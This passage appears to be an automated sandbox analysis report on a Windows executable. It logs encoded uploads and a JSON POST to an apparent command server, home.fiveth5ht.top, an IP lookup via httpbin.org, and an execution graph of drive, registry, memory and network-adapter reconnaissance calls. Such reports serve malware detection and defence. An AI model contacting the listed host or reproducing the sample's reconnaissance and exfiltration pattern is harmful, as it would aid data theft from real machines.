                                                          Data Ascii: fX3p+1JF2f6mGP\/npF\/j+vp3ojjdmdEh2OP3P+s\/zz6celT7Xzl\/XzAh+SPY\/7z93+9zJ\/qJv8\/1ok+Vv9X\/rJf3v\/LD\/AD6UeWm7Zs+eSL\/ln\/yxyf8AOfrT23x7937z975s3lxf67\/P0759KPa+cv6+Z0H7zSWcMg+SbY\/\/ADzkP1\/DP+eKoyafL\/cO3nHA7+5P9Casfx\/8C\/rVlZH\/AIH\/AM+\/
                                                          Dec 27, 2024 15:12:26.127389908 CET2472OUTData Raw: 63 52 54 31 5c 2f 65 55 4d 52 67 61 56 4b 72 43 36 61 61 35 36 63 70 52 62 54 54 53 64 31 71 65 71 5c 2f 73 4d 36 74 34 51 5c 2f 61 55 5c 2f 59 76 38 41 47 58 37 42 50 78 71 57 66 77 6e 38 57 5c 2f 67 31 34 5a 31 5c 2f 34 42 5c 2f 46 76 77 49 5a
                                                          Data Ascii: cRT1\/eUMRgaVKrC6aa56cpRbTTSd1qeq\/sM6t4Q\/aU\/Yv8AGX7BPxqWfwn8W\/g14Z1\/4B\/FvwIZrax8T6XomlXdxpfhLxz4ejkWa31CxtrX+yEh1iJL6xPiHS\/Pulk07VdJl1LyD4Y\/8Egfi7ZeM\/g7pHxw\/avv\/id+z3+z54pj8UfDP4ZWWianp1xJNaalFqlnp939t1K6s9CsZbm3gjvha3Gu3CaZ9r0jR59J
                                                          Dec 27, 2024 15:12:26.127444029 CET2472OUTData Raw: 5c 2f 2b 6e 66 38 41 41 66 6d 66 36 63 55 34 66 63 6a 5c 2f 41 50 61 6e 5c 2f 48 78 5c 2f 6e 31 70 70 2b 38 37 38 37 34 5c 2f 33 58 6d 66 35 79 65 54 39 4b 41 39 72 5c 2f 65 5c 2f 44 5c 2f 67 45 47 33 79 32 33 5c 2f 77 44 62 4b 4b 50 5c 2f 41 44
                                                          Data Ascii: \/+nf8AAfmf6cU4fcj\/APan\/Hx\/n1pp+87874\/3Xmf5yeT9KA9r\/e\/D\/gEG3y23\/wDbKKP\/AD\/nv6VF5aR\/uXT\/APV3\/oP8KtSSffQfP3HmS\/uOP89\/6VA2zzPnSV\/3Q83\/AOvycf0Naez8\/wAP+CdAyTyf4E3+X\/n29P5+lQybG3v9zzJTiTp+X+TmptqbU+WR3z1j\/wA8f\/WpnXZ8nyeb+6j9fw\
                                                          Dec 27, 2024 15:12:26.127522945 CET2472OUTData Raw: 2b 65 63 5a 71 49 74 7a 39 5c 2f 5a 43 5a 66 33 76 5c 2f 50 44 4f 66 38 41 50 54 38 76 54 54 32 66 6e 2b 48 5c 2f 41 41 54 6f 50 33 64 6f 72 45 38 53 61 39 5a 2b 47 4e 44 31 4c 58 39 51 4f 4c 4c 53 37 63 33 4e 77 64 77 58 45 59 64 55 2b 38 51 51
                                                          Data Ascii: +ecZqItz9\/ZCZf3v\/PDOf8APT8vTT2fn+H\/AAToP3dorE8Sa9Z+GND1LX9QOLLS7c3NwdwXEYdU+8QQOXHODXbfFPSNG+Fdx8RLSX4r\/Bv4h3vwa+Lfhz4IfGnSfhvrXxJfWPhP8QvF+neK9S8Lab4ptviX8JvhjZapp+uJ4G8V2lprvgXUvGOiRajo01le39q91pzXvxGf8ccJ8LZhlOV8QZ5g8qx+eylHKsPivap4vlxm
                                                          Dec 27, 2024 15:12:26.127552986 CET2472OUTData Raw: 46 34 51 31 66 34 7a 2b 48 6b 6c 66 77 6e 34 30 38 49 66 44 32 48 77 48 6f 72 66 46 72 34 44 66 44 4d 61 33 34 5c 2f 38 58 65 4c 5c 2f 41 42 76 6f 65 69 65 44 4e 4d 73 44 4a 6f 65 73 61 68 4b 62 4b 66 78 46 59 58 74 7a 70 64 74 71 48 35 7a 6b 33
                                                          Data Ascii: F4Q1f4z+Hklfwn408IfD2HwHorfFr4DfDMa34\/8XeL\/ABvoeieDNMsDJoesahKbKfxFYXtzpdtqH5zk3F30ceHeJ+LOP+HM14Xy3iHj\/Ksix\/GmfZRTx0aOeZfw1gsTj8kzfO\/qlCWW08RhcBxbO+b4mnRx2Mw+YYDC4vE4iOHwFGh+iZx4Z\/Sh4i4a4W4Ez7hnizMMg4FzvOcp4OyLN6mXqvlGbcTY3DZdmuSZFDG4qG
                                                          Dec 27, 2024 15:12:26.247047901 CET2472OUTData Raw: 79 4e 6a 42 71 32 70 61 78 71 4d 66 6d 36 66 6f 39 72 4c 63 5c 2f 61 4e 53 75 74 39 34 39 78 4c 45 59 59 58 6a 74 34 76 6e 5c 2f 77 52 72 4e 6a 34 39 30 6e 34 62 61 5c 2f 70 57 75 65 45 4e 4f 30 44 34 6a 61 42 38 55 76 48 54 61 39 34 67 38 51 33
                                                          Data Ascii: yNjBq2paxqMfm6fo9rLc\/aNSut949xLEYYXjt4vn\/wRrNj490n4ba\/pWueENO0D4jaB8UvHTa94g8Q3OmaN4C+Fnwd1XSNA8a\/Fz4hX66LdR6T4Aj8Rapc+GNCutGHiHxD4o8W6LqPg7w54c1PxbeeHdD152oatoNxe+K4vh\/8AEf4T\/GPTfB\/wOl+O+oat8NNV+KMsl5oafFjwl8GovB1h4W8dfB3wL48X4hXvi3xv4
                                                          Dec 27, 2024 15:12:59.126312971 CET194INHTTP/1.0 504 Gateway Time-out
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.4497385.101.3.217807252C:\Users\user\Desktop\f7qbEfJl0B.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 27, 2024 15:12:59.994853020 CET269OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 128
                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                          Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
                                                          Dec 27, 2024 15:13:03.199084044 CET309INHTTP/1.1 502 Bad Gateway
                                                          Server: nginx/1.22.1
                                                          Date: Fri, 27 Dec 2024 14:13:02 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44973034.226.108.1554437252C:\Users\user\Desktop\f7qbEfJl0B.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-27 14:12:23 UTC52OUTGET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-27 14:12:23 UTC224INHTTP/1.1 200 OK
                                                          Date: Fri, 27 Dec 2024 14:12:23 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-27 14:12:23 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:09:12:17
                                                          Start date:27/12/2024
                                                          Path:C:\Users\user\Desktop\f7qbEfJl0B.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\f7qbEfJl0B.exe"
                                                          Imagebase:0xf90000
                                                          File size:4'487'168 bytes
                                                          MD5 hash:01FBECB34B5AC1C9C3336C64817F1637
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4.1%
                                                            Dynamic/Decrypted Code Coverage:22.3%
                                                            Signature Coverage:11%
                                                            Total number of Nodes:663
                                                            Total number of Limit Nodes:88
                                                            execution_graph 65158 fa1139 65174 fcbaa0 65158->65174 65160 fa1148 65161 fa1512 65160->65161 65163 fa1161 65160->65163 65164 fa1527 65161->65164 65179 f9fec0 10 API calls 65161->65179 65172 fa0f00 65163->65172 65178 fa0150 _open 65163->65178 65164->65172 65180 fa22d0 10 API calls 65164->65180 65168 fa0150 _open 65168->65172 65169 fa0f7b 65171 f975a0 _open 65171->65172 65172->65168 65172->65169 65172->65171 65181 fcd4d0 6 API calls 65172->65181 65182 fa4940 _open 65172->65182 65183 fa3900 _open 65172->65183 65175 fcbb60 65174->65175 65177 fcbac7 65174->65177 65175->65160 65177->65175 65184 fb05b0 _open 65177->65184 65178->65172 65179->65164 65180->65172 65181->65172 65182->65172 65183->65172 65184->65175 65185 1043c00 65186 1043c23 65185->65186 65188 1043c0d 65185->65188 65186->65188 65189 105b180 65186->65189 65190 105b2e3 65189->65190 65191 105b19b 65189->65191 65190->65188 65191->65190 65194 105b2a9 getsockname 65191->65194 65196 105b020 closesocket 65191->65196 65197 105af30 65191->65197 65201 105b060 65191->65201 65206 105b020 65194->65206 65196->65191 65198 105af63 socket 65197->65198 65199 105af4c 65197->65199 65198->65191 65199->65198 65200 105af52 65199->65200 65200->65191 65205 105b080 65201->65205 65202 105b0b0 connect 65203 105b0bf WSAGetLastError 65202->65203 65204 105b0ea 65203->65204 65203->65205 65204->65191 65205->65202 65205->65203 65205->65204 65207 105b052 65206->65207 65208 105b029 65206->65208 65207->65191 65209 105b04b closesocket 65208->65209 65210 105b03e 65208->65210 65209->65207 65210->65191 65349 1044720 65353 1044728 65349->65353 65350 1044733 65352 1044774 65353->65350 65360 104476c 65353->65360 65361 1045540 socket ioctlsocket connect getsockname closesocket 65353->65361 65355 104482e 65355->65360 65362 1049270 65355->65362 65357 1044860 65367 1044950 65357->65367 65359 1044878 65360->65359 65373 10430a0 socket ioctlsocket connect getsockname closesocket 65360->65373 65361->65355 65374 104a440 65362->65374 65364 1049297 65366 10492ab 65364->65366 65408 104bbe0 socket ioctlsocket connect getsockname closesocket 65364->65408 65366->65357 65368 1044966 65367->65368 65370 10449b9 65368->65370 65372 10449c5 65368->65372 65409 104bbe0 socket ioctlsocket connect getsockname closesocket 65368->65409 65369 1044aa0 gethostname 65369->65370 65369->65372 65370->65369 65370->65372 65372->65360 65373->65352 65375 104a46b 65374->65375 65377 104a48b GetAdaptersAddresses 65375->65377 65406 104a4db 65375->65406 65376 104aa03 RegOpenKeyExA 65378 104aa27 RegQueryValueExA 65376->65378 65379 104ab70 RegOpenKeyExA 65376->65379 65391 104a4a6 65377->65391 65377->65406 65380 104aa71 65378->65380 65381 104aacc RegQueryValueExA 65378->65381 65382 104ac34 RegOpenKeyExA 65379->65382 65403 104ab90 65379->65403 65380->65381 65390 104aa85 RegQueryValueExA 65380->65390 65383 104ab66 RegCloseKey 65381->65383 65384 104ab0e 65381->65384 65385 104acf8 RegOpenKeyExA 65382->65385 65405 104ac54 65382->65405 65383->65379 65384->65383 65392 104ab1e RegQueryValueExA 65384->65392 65386 104ad56 RegEnumKeyExA 65385->65386 65393 104ad14 65385->65393 65389 104ad9b 65386->65389 65386->65393 65387 104a4f3 GetAdaptersAddresses 65388 104a505 65387->65388 65387->65406 65398 104a527 GetAdaptersAddresses 65388->65398 65388->65406 65394 104ae16 RegOpenKeyExA 65389->65394 65395 104aab3 65390->65395 65391->65387 65391->65406 65401 104ab4c 65392->65401 65393->65364 65396 104ae34 RegQueryValueExA 65394->65396 65397 104addf RegEnumKeyExA 65394->65397 65395->65381 65399 104af43 RegQueryValueExA 65396->65399 65407 104adaa 65396->65407 65397->65393 65397->65394 65398->65406 65400 104b052 RegQueryValueExA 65399->65400 65399->65407 65402 104adc7 RegCloseKey 65400->65402 65400->65407 65401->65383 65402->65397 65403->65382 65404 104afa0 RegQueryValueExA 65404->65407 65405->65385 65406->65376 65406->65393 65407->65399 65407->65400 65407->65402 65407->65404 65408->65366 65409->65370 65410 f9255d 65454 1319f70 65410->65454 65413 f92589 65414 f925a0 GlobalMemoryStatusEx 65413->65414 65415 f925ec 65414->65415 65456 6e0025d 65415->65456 65462 6e0015a 65415->65462 65468 6e000d6 65415->65468 65474 6e00296 65415->65474 65480 6e00314 65415->65480 65484 6e00191 65415->65484 65490 6e00150 65415->65490 65496 6e0020c 65415->65496 65502 6e0004b 65415->65502 65510 6e00008 65415->65510 65518 6e00347 65415->65518 65522 6e00244 65415->65522 65528 6e00000 65415->65528 65536 6e0017f 65415->65536 65542 6e001be 65415->65542 65548 6e001fd 65415->65548 65554 6e0027a 65415->65554 65560 6e00037 65415->65560 65568 6e00076 65415->65568 65574 6e000f4 65415->65574 65580 6e00334 65415->65580 65583 6e0006e 65415->65583 65589 6e001aa 65415->65589 65595 6e001e8 65415->65595 65601 6e002a7 65415->65601 65607 6e000e3 65415->65607 65613 6e000a2 65415->65613 65619 6e00322 65415->65619 65623 6e002e2 65415->65623 65455 f9256c GetSystemInfo 65454->65455 65455->65413 65458 6e00286 65456->65458 65457 6e00314 GetLogicalDrives 65457->65458 65458->65457 65459 6e0030f GetLogicalDrives 65458->65459 65461 6e00307 65458->65461 65459->65461 65463 6e00189 65462->65463 65464 6e00314 GetLogicalDrives 65463->65464 65465 6e0030f GetLogicalDrives 65463->65465 65467 6e00307 65463->65467 65464->65463 65465->65467 65470 6e000db 65468->65470 65469 6e00314 GetLogicalDrives 65469->65470 65470->65469 65471 6e0030f GetLogicalDrives 65470->65471 65473 6e00307 65470->65473 65471->65473 65475 6e0029f 65474->65475 65476 6e00314 GetLogicalDrives 65475->65476 65477 6e0030f GetLogicalDrives 65475->65477 65479 6e00307 65475->65479 65476->65475 65477->65479 65481 6e00329 GetLogicalDrives 65480->65481 65483 6e00352 65481->65483 65485 6e0019d 65484->65485 65486 6e00314 GetLogicalDrives 65485->65486 65487 6e0030f GetLogicalDrives 65485->65487 65489 6e00307 65485->65489 65486->65485 65487->65489 65491 6e00163 65490->65491 65492 6e00314 GetLogicalDrives 65491->65492 65493 6e0030f GetLogicalDrives 65491->65493 65495 6e00307 65491->65495 65492->65491 65493->65495 65497 6e00250 65496->65497 65498 6e00314 GetLogicalDrives 65497->65498 65499 6e0030f GetLogicalDrives 65497->65499 65500 6e00307 65497->65500 65498->65497 65499->65500 65503 6e00051 65502->65503 65504 6e0006e 2 API calls 65503->65504 65505 6e00063 65504->65505 65506 6e00314 GetLogicalDrives 65505->65506 65507 6e0030f GetLogicalDrives 65505->65507 65509 6e00307 65505->65509 65506->65505 65507->65509 65511 6e00040 65510->65511 65512 6e0006e 2 API calls 65511->65512 65513 6e00063 65512->65513 65514 6e00314 GetLogicalDrives 65513->65514 65515 6e0030f GetLogicalDrives 65513->65515 65517 6e00307 65513->65517 65514->65513 65515->65517 65519 6e0030d 65518->65519 65520 6e0033d GetLogicalDrives 65519->65520 65521 6e0034f 65519->65521 65520->65521 65523 6e00265 65522->65523 65524 6e00314 GetLogicalDrives 65523->65524 65525 6e0030f GetLogicalDrives 65523->65525 65527 6e00307 65523->65527 65524->65523 65525->65527 65529 6e00019 65528->65529 65530 6e0006e 2 API calls 65529->65530 65531 6e00063 65530->65531 65532 6e00314 GetLogicalDrives 65531->65532 65533 6e0030f GetLogicalDrives 65531->65533 65535 6e00307 65531->65535 65532->65531 65533->65535 65537 6e00186 65536->65537 65538 6e00314 GetLogicalDrives 65537->65538 65539 6e0030f GetLogicalDrives 65537->65539 65541 6e00307 65537->65541 65538->65537 65539->65541 65543 6e001c8 65542->65543 65544 6e00314 GetLogicalDrives 65543->65544 65545 6e0030f GetLogicalDrives 65543->65545 65547 6e00307 65543->65547 65544->65543 65545->65547 65549 6e0019d 65548->65549 65550 6e00314 GetLogicalDrives 65549->65550 65551 6e0030f GetLogicalDrives 65549->65551 65553 6e00307 65549->65553 65550->65549 65551->65553 65555 6e0029f 65554->65555 65556 6e00314 GetLogicalDrives 65555->65556 65557 6e0030f GetLogicalDrives 65555->65557 65559 6e00307 65555->65559 65556->65555 65557->65559 65561 6e00046 65560->65561 65564 6e00063 65560->65564 65562 6e0006e 2 API calls 65561->65562 65562->65564 65563 6e00314 GetLogicalDrives 65563->65564 65564->65563 65565 6e0030f GetLogicalDrives 65564->65565 65567 6e00307 65564->65567 65565->65567 65569 6e0008d 65568->65569 65570 6e00314 GetLogicalDrives 65569->65570 65571 6e0030f GetLogicalDrives 65569->65571 65573 6e00307 65569->65573 65570->65569 65571->65573 65575 6e000ba 65574->65575 65576 6e00314 GetLogicalDrives 65575->65576 65577 6e0030f GetLogicalDrives 65575->65577 65579 6e00307 65575->65579 65576->65575 65577->65579 65581 6e0033d GetLogicalDrives 65580->65581 65582 6e00352 65581->65582 65584 6e00081 65583->65584 65585 6e00314 GetLogicalDrives 65584->65585 65586 6e0030f GetLogicalDrives 65584->65586 65588 6e00307 65584->65588 65585->65584 65586->65588 65590 6e001b1 65589->65590 65591 6e00314 GetLogicalDrives 65590->65591 65592 6e0030f GetLogicalDrives 65590->65592 65594 6e00307 65590->65594 65591->65590 65592->65594 65596 6e001f1 65595->65596 65597 6e00314 GetLogicalDrives 65596->65597 65598 6e0030f GetLogicalDrives 65596->65598 65600 6e00307 65596->65600 65597->65596 65598->65600 65603 6e0029f 65601->65603 65602 6e00314 GetLogicalDrives 65602->65603 65603->65602 65604 6e0030f GetLogicalDrives 65603->65604 65606 6e00307 65603->65606 65604->65606 65608 6e000ee 65607->65608 65609 6e00314 GetLogicalDrives 65608->65609 65610 6e0030f GetLogicalDrives 65608->65610 65612 6e00307 65608->65612 65609->65608 65610->65612 65614 6e000a5 65613->65614 65615 6e00314 GetLogicalDrives 65614->65615 65616 6e0030f GetLogicalDrives 65614->65616 65618 6e00307 65614->65618 65615->65614 65616->65618 65620 6e00329 GetLogicalDrives 65619->65620 65622 6e00352 65620->65622 65626 6e0029f 65623->65626 65628 6e00307 65623->65628 65624 6e00314 GetLogicalDrives 65624->65626 65625 6e0030f GetLogicalDrives 65625->65628 65626->65624 65626->65625 65626->65628 65211 105a080 65214 1059740 65211->65214 65213 105a09b 65215 1059780 65214->65215 65219 105975d 65214->65219 65216 1059925 RegOpenKeyExA 65215->65216 65215->65219 65217 105995a RegQueryValueExA 65216->65217 65216->65219 65218 1059986 RegCloseKey 65217->65218 65218->65219 65219->65213 65220 f929ff FindFirstFileA 65221 f92a31 65220->65221 65222 f92a5c RegOpenKeyExA 65221->65222 65223 f92a93 65222->65223 65224 f92ade CharUpperA 65223->65224 65226 f92b0a 65224->65226 65225 f92bf9 QueryFullProcessImageNameA 65227 f92c3b CloseHandle 65225->65227 65226->65225 65229 f92c64 65227->65229 65228 f92df1 CloseHandle 65230 f92e23 65228->65230 65229->65228 65629 f93d5e 65634 f93d30 65629->65634 65630 f93d90 65638 f9fcb0 10 API calls 65630->65638 65633 f93dc1 65634->65629 65634->65630 65635 fa0ab0 65634->65635 65639 fa05b0 65635->65639 65638->65633 65640 fa07c7 65639->65640 65648 fa05bd 65639->65648 65640->65634 65641 fa066a 65658 fcdec0 65641->65658 65645 fa067b 65652 fa06f0 65645->65652 65654 fa07ce 65645->65654 65665 fa73b0 _open 65645->65665 65648->65640 65648->65641 65648->65654 65663 fa03c0 _open 65648->65663 65664 fa7450 _open 65648->65664 65649 fa0707 WSAEventSelect 65649->65652 65649->65654 65650 fa07ef 65651 fa6fa0 4 API calls 65650->65651 65650->65654 65655 fa0847 65650->65655 65651->65655 65652->65649 65652->65650 65666 f976a0 65652->65666 65677 fa7380 _open 65654->65677 65655->65654 65656 fa09e8 WSAEnumNetworkEvents 65655->65656 65657 fa09d0 WSAEventSelect 65655->65657 65656->65655 65656->65657 65657->65655 65657->65656 65659 fcdf1e 65658->65659 65661 fcdece 65658->65661 65678 fcdf30 65661->65678 65662 fcdef9 65662->65645 65663->65648 65664->65648 65665->65645 65667 f976c0 65666->65667 65668 f976e6 send 65666->65668 65667->65668 65669 f976c9 65667->65669 65670 f976d3 65668->65670 65676 f97704 65668->65676 65669->65670 65671 f9770b 65669->65671 65686 f972a0 _open 65670->65686 65687 f972a0 _open 65671->65687 65674 f9771c 65688 f9cb20 _open 65674->65688 65676->65652 65677->65640 65679 fcdf44 65678->65679 65681 fcdfb9 65679->65681 65683 fcdfb5 65679->65683 65684 fa7450 _open 65679->65684 65685 fa7380 _open 65681->65685 65683->65662 65684->65679 65685->65683 65686->65676 65687->65674 65688->65676 65231 fc95b0 65232 fc95c8 65231->65232 65234 fc95fd 65231->65234 65232->65234 65235 fca150 65232->65235 65236 fca15f 65235->65236 65245 fca246 65235->65245 65237 fca181 getsockname 65236->65237 65236->65245 65238 fca1f7 65237->65238 65239 fca1d0 65237->65239 65248 fcef30 65238->65248 65247 fad090 _open 65239->65247 65242 fca1eb 65258 fd4f40 _open 65242->65258 65245->65234 65247->65242 65249 fcefa8 65248->65249 65250 fcef47 65248->65250 65256 fca20f 65249->65256 65261 f9c960 _open 65249->65261 65251 fcef4c 65250->65251 65252 fcef81 65250->65252 65251->65256 65259 ff3d10 _open 65251->65259 65260 ff3d10 _open 65252->65260 65256->65245 65257 fad090 _open 65256->65257 65257->65242 65258->65245 65259->65256 65260->65256 65261->65256 65262 fc6ab0 65263 fc6ad5 65262->65263 65264 fc6bb4 65263->65264 65271 fa6fa0 65263->65271 65265 1045ed0 9 API calls 65264->65265 65267 fc6ba9 65265->65267 65270 fc6b5d 65270->65267 65279 1045ed0 65270->65279 65272 fa6feb 65271->65272 65274 fa6fd4 65271->65274 65272->65264 65272->65267 65272->65270 65273 fa7207 select 65273->65272 65278 fa7233 65273->65278 65274->65272 65274->65273 65275 fa726b __WSAFDIsSet 65276 fa729a __WSAFDIsSet 65275->65276 65275->65278 65277 fa72ba __WSAFDIsSet 65276->65277 65276->65278 65277->65278 65278->65272 65278->65275 65278->65276 65278->65277 65282 1045a50 65279->65282 65281 1045ee5 65281->65270 65283 1045a58 65282->65283 65290 1045ea0 65282->65290 65284 1045a99 65283->65284 65286 1045b50 65283->65286 65289 1045b88 65283->65289 65284->65289 65297 1045be2 __WSAFDIsSet 65284->65297 65300 10470a0 6 API calls 65284->65300 65314 1046f10 socket ioctlsocket connect getsockname closesocket 65284->65314 65285 1045cae 65287 1045e96 65285->65287 65298 1045da1 __WSAFDIsSet 65285->65298 65303 105a920 65285->65303 65316 1059320 socket ioctlsocket connect getsockname closesocket 65285->65316 65286->65289 65291 1045eb4 65286->65291 65292 1045b7a 65286->65292 65317 1059480 socket ioctlsocket connect getsockname closesocket 65287->65317 65289->65285 65315 1045ef0 socket ioctlsocket connect getsockname 65289->65315 65290->65281 65318 1046f10 socket ioctlsocket connect getsockname closesocket 65291->65318 65307 10470a0 65292->65307 65296 1045ec2 65296->65296 65297->65284 65298->65285 65300->65284 65304 105a944 65303->65304 65305 105a94b 65304->65305 65306 105a977 send 65304->65306 65305->65285 65306->65285 65311 10470ae 65307->65311 65309 10471a7 65309->65289 65310 104717f 65310->65309 65324 1059320 socket ioctlsocket connect getsockname closesocket 65310->65324 65311->65309 65311->65310 65319 105a8c0 65311->65319 65323 10471c0 socket ioctlsocket connect getsockname 65311->65323 65314->65284 65315->65289 65316->65285 65317->65290 65318->65296 65320 105a8e6 65319->65320 65321 105a903 recvfrom 65319->65321 65320->65321 65322 105a8ed 65320->65322 65321->65322 65322->65311 65323->65311 65324->65309 65689 fc8b50 65690 fc8b6b 65689->65690 65718 fc8be6 65689->65718 65691 fc8b8f 65690->65691 65692 fc8bf3 65690->65692 65690->65718 65781 fa6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 65691->65781 65722 fca550 65692->65722 65696 fc8cd9 SleepEx 65707 fc8d14 65696->65707 65697 fc8e85 65701 fc8eae 65697->65701 65697->65718 65787 fa2a00 _open 65697->65787 65698 fc8c1f connect 65699 fc8c35 65698->65699 65705 fca150 2 API calls 65699->65705 65700 fca150 2 API calls 65710 fc8dff 65700->65710 65701->65718 65788 f978b0 closesocket 65701->65788 65702 fc8cb2 65702->65697 65702->65700 65702->65718 65719 fc8c4d 65705->65719 65706 fc8bb5 65706->65718 65783 fd50a0 _open 65706->65783 65707->65702 65708 fc8d43 65707->65708 65715 fca150 2 API calls 65708->65715 65709 fc8c8b 65713 fc8dc8 65709->65713 65714 fc8ba1 65709->65714 65710->65697 65785 fad090 _open 65710->65785 65784 fcb100 _open 65713->65784 65714->65696 65714->65702 65714->65706 65715->65706 65716 fc8e67 65786 fd4fd0 _open 65716->65786 65719->65709 65782 fd50a0 _open 65719->65782 65723 fca575 65722->65723 65726 fca597 65723->65726 65792 f975e0 65723->65792 65725 fca6d9 65728 fca709 65725->65728 65738 fca713 65725->65738 65807 fa2a00 _open 65725->65807 65726->65725 65727 fcef30 _open 65726->65727 65730 fca63a 65727->65730 65731 f978b0 2 API calls 65728->65731 65728->65738 65735 fca641 65730->65735 65739 fca69b 65730->65739 65731->65738 65732 fc8bfc 65732->65698 65732->65699 65732->65702 65732->65718 65733 fca7e5 65737 fca811 setsockopt 65733->65737 65741 fca87c 65733->65741 65754 fca8ee 65733->65754 65735->65733 65809 fd4fd0 _open 65735->65809 65737->65741 65747 fca83b 65737->65747 65738->65732 65808 fd50a0 _open 65738->65808 65805 fad090 _open 65739->65805 65741->65754 65812 fcb1e0 _open 65741->65812 65742 fca6c9 65806 fd4f40 _open 65742->65806 65744 fcaf33 65804 ff67e0 ioctlsocket 65744->65804 65747->65741 65810 fad090 _open 65747->65810 65748 fcaf56 65748->65725 65750 fcaf5d 65748->65750 65750->65738 65753 fca150 2 API calls 65750->65753 65751 fca86d 65811 fd4fd0 _open 65751->65811 65753->65738 65754->65725 65754->65744 65756 fcacb8 65754->65756 65757 fcae32 65754->65757 65759 fcabb9 65754->65759 65780 fcabe1 65754->65780 65755 fcaf03 65755->65744 65821 fd4fd0 _open 65755->65821 65756->65725 65756->65759 65764 fcacdc 65756->65764 65757->65759 65820 fd4fd0 _open 65757->65820 65761 fcad45 65759->65761 65763 fcade6 65759->65763 65759->65780 65814 fc6be0 14 API calls 65759->65814 65760 fcb056 65823 fad090 _open 65760->65823 65762 fcad5f 65761->65762 65761->65763 65815 fe20d0 _open 65762->65815 65818 fad090 _open 65763->65818 65813 fad090 _open 65764->65813 65768 fcb07b 65824 fd4f40 _open 65768->65824 65771 fcad7b 65775 fcadb7 65771->65775 65816 fd4fd0 _open 65771->65816 65817 fe3030 _open 65775->65817 65776 fcad01 65819 fd4f40 _open 65776->65819 65780->65725 65780->65755 65780->65760 65822 fd4fd0 _open 65780->65822 65781->65714 65782->65709 65783->65718 65784->65702 65785->65716 65786->65697 65787->65701 65789 f978d7 65788->65789 65790 f978c5 65788->65790 65789->65718 65828 f972a0 _open 65790->65828 65793 f975ef 65792->65793 65794 f97607 socket 65792->65794 65793->65794 65797 f97601 65793->65797 65798 f97643 65793->65798 65795 f9762b 65794->65795 65796 f9763a 65794->65796 65825 f972a0 _open 65795->65825 65796->65726 65797->65794 65826 f972a0 _open 65798->65826 65801 f97654 65827 f9cb20 _open 65801->65827 65803 f97674 65803->65726 65804->65748 65805->65742 65806->65725 65807->65728 65808->65732 65809->65733 65810->65751 65811->65741 65812->65754 65813->65776 65814->65761 65815->65771 65816->65775 65817->65780 65818->65776 65819->65725 65820->65759 65821->65744 65822->65780 65823->65768 65824->65725 65825->65796 65826->65801 65827->65803 65828->65789 65829 f931d7 65832 f931f4 65829->65832 65830 f93200 65831 f932dc CloseHandle 65831->65830 65832->65830 65832->65831 65833 f92f17 65841 